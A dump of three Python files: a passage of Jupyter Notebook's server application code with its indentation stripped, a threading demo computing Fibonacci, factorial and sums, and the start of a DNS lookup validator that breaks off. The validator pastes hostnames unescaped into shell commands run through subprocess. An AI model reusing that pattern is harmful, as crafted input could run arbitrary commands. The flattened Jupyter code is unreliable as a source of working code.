if not os.path.isdir(value):
raise TraitError(trans.gettext("No such notebook dir: '%r'") % value)
return value
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=(_("DEPRECATED use the nbserver_extensions dict instead"))
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning(_("server_extensions is deprecated, use nbserver_extensions"))
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=(_("Dict of Python modules to load as notebook server extensions. "
"Entry values can be used to enable and disable the loading of "
"the extensions. The extensions will be loaded in alphabetical "
"order."))
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(1000, config=True, help=_("""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""))
iopub_data_rate_limit = Float(1000000, config=True, help=_("""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""))
rate_limit_window = Float(3, config=True, help=_("""(sec) Time window used to
check the message and data rate limits."""))
shutdown_no_activity_timeout = Integer(0, config=True,
help=("Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the notebook server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown.")
)
terminals_enabled = Bool(True, config=True,
help=_("""Set to False to disable terminals.
This does *not* make the notebook server more secure by itself.
        Anything the user can do in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""))
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
"""
).tag(config=True)
@default('authenticate_prometheus')
def _default_authenticate_prometheus(self):
""" Authenticate Prometheus by default, unless auth is disabled. """
auth = bool(self.password) or bool(self.token)
if auth is False:
self.log.info(_("Authentication of /metrics is OFF, since other authentication is disabled."))
return auth
@observe('authenticate_prometheus')
def _update_authenticate_prometheus(self, change):
newauth = change['new']
if self.authenticate_prometheus is True and newauth is False:
self.log.info(_("Authentication of /metrics is being turned OFF."))
self.authenticate_prometheus = newauth
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
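    # Illustrative note (assumption, not taken from the original source): the two
    # positional-argument forms handled above map to config roughly as
    #
    #   jupyter notebook /path/to/dir      ->  c.NotebookApp.notebook_dir = '/path/to/dir'
    #   jupyter notebook analysis.ipynb    ->  c.NotebookApp.file_to_run  = '<abs path>/analysis.ipynb'
    #
    # and, because the values go through update_config(), they take priority over
    # anything loaded from the config directories.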
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = 'notebook.gateway.managers.GatewayKernelManager'
self.session_manager_class = 'notebook.gateway.managers.GatewaySessionManager'
self.kernel_spec_manager_class = 'notebook.gateway.managers.GatewayKernelSpecManager'
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
# Ensure the appropriate version of Python and jupyter_client is available.
if isinstance(self.kernel_manager, AsyncMappingKernelManager):
if not async_kernel_mgmt_available: # Can be removed once jupyter_client >= 6.1 is required.
raise ValueError("You are using `AsyncMappingKernelManager` without an appropriate "
"jupyter_client installed! Please upgrade jupyter_client or change kernel managers.")
self.log.info("Asynchronous kernel management has been configured to use '{}'.".
format(self.kernel_manager.__class__.__name__))
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
        # This prevents double log messages because tornado uses a root logger that
        # self.log is a child of. The logging module dispatches log messages to a logger
        # and all of its ancestors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug('Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)')
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
'Raising open file limit: soft {}->{}; hard {}->{}'.format(old_soft, soft, old_hard, hard)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
self.tornado_settings['websocket_compression_options'] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['autoreload'] = self.autoreload
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['get_secure_cookie_kwargs'] = self.get_secure_cookie_kwargs
self.tornado_settings['token'] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(_("Notebook servers are configured to only be run with a password."))
self.log.critical(_("Hint: run the following command to set a password"))
self.log.critical(_("\t$ python -m notebook.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_NOTEBOOK_PORT:
self.log.critical(
_('Options --port and --sock are mutually exclusive. Aborting.'),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
_('Ignoring --NotebookApp.open_browser due to --sock being used.'),
)
if self.file_to_run:
self.log.critical(
_('Options --NotebookApp.file_to_run and --sock are mutually exclusive.'),
)
sys.exit(1)
if sys.platform.startswith('win'):
self.log.critical(
_('Option --sock is not supported on Windows, but got value of %s. Aborting.' % self.sock),
)
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager, self.extra_services,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options,
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
# PROTOCOL_TLS is new in version 2.7.13, 3.5.3 and 3.6
ssl_options.setdefault(
'ssl_version',
getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)
)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
eacces = (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES))
if sys.platform == 'cygwin':
# Cygwin has a bug that causes EPERM to be returned in this
# case instead of EACCES:
# https://cygwin.com/ml/cygwin/2019-04/msg00160.html
eacces += (errno.EPERM,)
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(_('The port %i is already in use, trying another port.') % port)
else:
self.log.info(_('The port %i is already in use.') % port)
continue
elif e.errno in eacces:
self.log.warning(_("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
else:
self.log.critical(_('ERROR: the notebook server could not be started because '
'port %i is not available.') % port)
self.exit(1)
return success
def _concat_token(self, url):
token = self.token if self._token_generated else '...'
return url_concat(url, {'token': token})
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
elif self.sock:
url = self._unix_sock_url()
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._tcp_url(ip)
if self.token and not self.sock:
url = self._concat_token(url)
if not self.custom_display_url:
url += '\n or %s' % self._concat_token(self._tcp_url('127.0.0.1'))
return url
@property
def connection_url(self):
if self.sock:
return self._unix_sock_url()
else:
ip = self.ip if self.ip else 'localhost'
return self._tcp_url(ip)
def _unix_sock_url(self, token=None):
return '%s%s' % (urlencode_unix_socket(self.sock), self.base_url)
def _tcp_url(self, ip, port=None):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, port or self.port, self.base_url)
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from .terminal import initialize
initialize(nb_app=self)
self.terminals_available = True
except ImportError as e:
self.log.warning(_("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_('interrupted'))
# Check if answer_yes is set
if self.answer_yes:
self.log.critical(_("Shutting down..."))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
print(self.notebook_info())
yes = _('y')
no = _('n')
sys.stdout.write(_("Shutdown this notebook server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
else:
print(_("No answer for 5s:"), end=' ')
print(_("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_("received signal %s, stopping"), sig)
self.io_loop.add_callback_from_signal(self.io_loop.stop)
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extension_config(self):
"""Consolidate server extensions specified by all configs.
        The resulting list is stored on self.nbserver_extensions and updates the config object.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
            # Don't override the disable state of the extension if it already
            # exists in the new traitlet
            if modulename not in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.nbserver_extensions:
self.config.NotebookApp.nbserver_extensions.update({modulename: enabled})
self.nbserver_extensions.update({modulename: enabled})
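    # Illustration (assumption; the module name "my_extension" is hypothetical):
    # an entry that the ConfigManager merge above would pick up from
    # <config dir>/jupyter_notebook_config.json looks like
    #
    #   {
    #     "NotebookApp": {
    #       "nbserver_extensions": {"my_extension": true}
    #     }
    #   }
    #
    # Entries from the user, env and system config directories are merged
    # key-by-key rather than clobbering each other.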
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
for modulename, enabled in sorted(self.nbserver_extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning(_("Error loading server extension %s"), modulename,
exc_info=True)
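    # Illustration (assumption; "my_extension" is a hypothetical module name):
    # the smallest module the loop above can load exposes a
    # load_jupyter_server_extension(nb_app) callable, e.g.
    #
    #   # my_extension.py
    #   def load_jupyter_server_extension(nb_app):
    #       # called with the NotebookApp instance at startup
    #       nb_app.log.info("my_extension loaded")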
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
        # and explicitly tell the mimetypes module not to trust the Windows registry
if os.name == 'nt':
# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type('text/css', '.css')
mimetypes.add_type('application/javascript', '.js')
# for python <3.8
mimetypes.add_type('application/wasm', '.wasm')
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings['terminal_manager']
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = \
(utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.",
seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info("No kernels or terminals for %d seconds; shutting down.",
seconds_since_active)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info("Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
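    # Illustration (assumption, values are examples only): idle shutdown is
    # typically combined with kernel culling, e.g.
    #
    #   jupyter notebook \
    #       --NotebookApp.shutdown_no_activity_timeout=3600 \
    #       --MappingKernelManager.cull_idle_timeout=600
    #
    # With these settings the periodic check above (run once a minute) stops the
    # server roughly an hour after the last kernel or terminal activity.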
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
With the introduction of the async kernel, the existing sync kernel
requires the use of nested loops in order to run code synchronously.
This is done in `jupyter_client` using the helper util `run_sync`:
ref: https://github.com/jupyter/jupyter_client/blob/f453b51eeeff9e905c583b7da3905c0e35cfbdf0/jupyter_client/utils.py#L11
which creates a new event loop and relies on `nest_asyncio` patching
to allow nested loops. This requires that *all* potential tasks are
patched before executing. When only some tasks are patched it leads to
the following issue:
ref: https://github.com/jupyter/notebook/issues/6164
So we must call `nest_asyncio.apply()` method as early as possible. It
is preferable to do this in the consuming application rather than the
`jupyter_client` as it is a global patch and would impact all consumers
rather than just the ones that rely on synchronous kernel behavior.
"""
import nest_asyncio
try:
nest_asyncio.apply()
except RuntimeError:
# nest_asyncio requires a running loop in order to patch.
# In tests the loop may not have been created yet.
pass
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(self, argv=None):
self._init_asyncio_patch()
super().initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_resources()
self.init_configurables()
self.init_server_extension_config()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
def cleanup_kernels(self):
"""Shutdown all kernels.
        The kernels will shut down by themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext('Shutting down %d kernel', 'Shutting down %d kernels', n_kernels)
self.log.info(kernel_msg % n_kernels)
run_sync(self.kernel_manager.shutdown_all())
def cleanup_terminals(self):
"""Shutdown all terminals.
        The terminals will shut down by themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings['terminal_manager']
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext('Shutting down %d terminal', 'Shutting down %d terminals', n_terminals)
self.log.info(terminal_msg % n_terminals)
run_sync(terminal_manager.terminate_all())
def notebook_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _("Jupyter Notebook {version} is running at:\n{url}".
format(version=NotebookApp.version, url=self.display_url))
if self.gateway_config.gateway_enabled:
info += _("\nKernels will be managed by the Gateway server running at:\n%s") % self.gateway_config.url
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'sock': self.sock,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_("Failed to write server-info to %s: %s"),
self.info_file, e)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def write_browser_open_file(self):
"""Write an nbserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url):]
with open(self.browser_open_file, 'w', encoding='utf-8') as f:
self._write_browser_open_file(open_url, f)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def remove_browser_open_file(self):
"""Remove the nbserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url):]
if self.token:
uri = url_concat(uri, {'token': self.token})
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical(_("%s does not exist") % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
# Write a temporary file to open in the browser
fd, open_file = tempfile.mkstemp(suffix='.html')
with open(fd, 'w', encoding='utf-8') as fh:
self._write_browser_open_file(uri, fh)
else:
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin('file:', pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
super().start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(_("Running as root is not recommended. Use --allow-root to bypass."))
self.exit(1)
success = self._bind_http_server()
if not success:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
self.exit(1)
info = self.log.info
for line in self.notebook_info(kernel_count=False).split("\n"):
info(line)
info(_("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."))
if 'dev' in notebook.__version__:
            info(_("Welcome to Project Jupyter! Explore the various tools available"
                   " and their corresponding documentation. If you are interested"
                   " in contributing to the platform, please visit the community "
                   "resources section at https://jupyter.org/community.html."))
self.write_server_info_file()
self.write_browser_open_file()
if (self.open_browser or self.file_to_run) and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical('\n'.join([
'\n',
'Notebook is listening on %s' % self.display_url,
'',
(
'UNIX sockets are not browser-connectable, but you can tunnel to '
'the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then '
'open e.g. %s in a browser.'
) % (self.sock, self._concat_token(self._tcp_url('localhost', 8888)))
]))
else:
if not self.custom_display_url:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste one of these URLs:',
' %s' % self.display_url,
]))
else:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste this URL:',
' %s' % self.display_url,
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info(_("Interrupted..."))
finally:
self.remove_server_info_file()
self.remove_browser_open_file()
self.cleanup_kernels()
self.cleanup_terminals()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
if re.match('nbserver-(.+).json', file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
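# Illustrative usage sketch (assumption, not part of the original module): the
# helper below simply consumes list_running_servers() defined above; its name
# is hypothetical.
def print_running_servers(runtime_dir=None):
    """Print the URL, pid and notebook dir of each running server found."""
    for info in list_running_servers(runtime_dir):
        print('%s :: pid %s :: %s' % (info['url'], info['pid'], info['notebook_dir']))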
|
1.2.py
|
'''
Multithreading demo: run a Fibonacci, a factorial and a summation task in
separate threads and time the whole run.
'''
import datetime
import threading

def fbnq(n):
    # naive recursive Fibonacci: F(0)=0, F(1)=1, F(n)=F(n-1)+F(n-2)
    summ = 0
    if n == 0:
        summ = 0
    elif n == 1:
        summ = 1
    elif n >= 2:
        summ = summ + fbnq(n - 1) + fbnq(n - 2)
    return summ

def jiecheng(n):
    # recursive factorial (assumes n >= 1)
    if n == 1:
        return 1
    else:
        return n * jiecheng(n - 1)

def sumn(n):
    # sum of the integers 0..n
    summ = 0
    for i in range(0, n + 1):
        summ += i
    return summ

if __name__ == "__main__":
    start = datetime.datetime.now()
    # The threads only exercise the functions; their return values are discarded
    # and each result is recomputed in the main thread for printing below.
    t1 = threading.Thread(target=fbnq, args=(15,))
    t1.start()
    t2 = threading.Thread(target=jiecheng, args=(15,))
    t2.start()
    t3 = threading.Thread(target=sumn, args=(15,))
    t3.start()
    print("Fibonacci number {} is {}".format(15, fbnq(15)))
    print("The factorial of {} is {}".format(15, jiecheng(15)))
    print("The sum of the first {} integers is {}".format(15, sumn(15)))
    t1.join()
    t2.join()
    t3.join()
    end = datetime.datetime.now()
    print(end - start)
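# Illustrative alternative (assumption, not part of the original script): the
# threads above discard their return values and every result is recomputed in
# the main thread for printing. The sketch below collects the results via
# concurrent.futures instead; the helper name run_with_pool is hypothetical and
# is not called automatically. (For these CPU-bound functions the GIL still
# prevents a real speed-up.)
from concurrent.futures import ThreadPoolExecutor

def run_with_pool(n=15):
    # submit the three computations and gather their results by name
    with ThreadPoolExecutor(max_workers=3) as pool:
        futures = {"fibonacci": pool.submit(fbnq, n),
                   "factorial": pool.submit(jiecheng, n),
                   "sum": pool.submit(sumn, n)}
        return {name: fut.result() for name, fut in futures.items()}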
|
dns_validator.py
|
#!/usr/bin/python3
import subprocess
import ipaddress
import socket
import threading
import logging
def valid_ip(address):
    """Return True if *address* is a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(address)
        return True
    except ValueError:
        return False
def get_ipresolver_output(ip, IP_STATUS, HOSTNAME):
    """Reverse-resolve *ip* and record the lookup status and hostname in the shared dicts."""
    try:
        if valid_ip(ip):
            # nslookup exits with 0 when the address resolves
            command = "nslookup " + str(ip) + " > /dev/null;echo $? "
            output = subprocess.getoutput(command)
            if output == '0':
                IP_STATUS[ip] = "O.K"
                # get hostname from the given ip
                hostname = socket.gethostbyaddr(ip)[0]
                HOSTNAME[ip] = hostname
            else:
                IP_STATUS[ip] = "FAILED"
                HOSTNAME[ip] = "FAILED"
        else:
            IP_STATUS[ip] = "N/A"
            HOSTNAME[ip] = "N/A"
    except Exception as e:
        logging.error(e)
        IP_STATUS[ip] = "N/A"
        HOSTNAME[ip] = "N/A"
def get_nameresolver_output(hostname, IP_LIST):
    """Forward-resolve *hostname* and record the resulting IP in the shared dict."""
    try:
        # nslookup exits with 0 when the name resolves
        command = "nslookup " + str(hostname) + " > /dev/null;echo $? "
        output = subprocess.getoutput(command)
        if output == '0':
            # get ip from the given hostname
            ip = socket.gethostbyname(hostname)
            IP_LIST[hostname] = ip
        else:
            IP_LIST[hostname] = "FAILED"
    except Exception as e:
        logging.error(e)
        IP_LIST[hostname] = "FAILED"
def ip_resolution_check(IP_LIST):
    """Check every address in IP_LIST concurrently; return (status, hostname) dicts."""
    IP_STATUS = {}
    HOSTNAME = {}
    try:
        threads = []
        for ip in IP_LIST:
            t = threading.Thread(target=get_ipresolver_output, args=(ip, IP_STATUS, HOSTNAME))
            t.start()
            threads.append(t)
        # join after all workers have started so the lookups actually run in parallel
        for t in threads:
            t.join()
        return IP_STATUS, HOSTNAME
    except Exception as e:
        logging.error(e)
        return {}, {}
def hostname_resolution_check(HOSTNAME_LIST):
    """Resolve every hostname in HOSTNAME_LIST concurrently; return a hostname -> IP dict."""
    IP_LIST = {}
    try:
        threads = []
        for hostname in HOSTNAME_LIST:
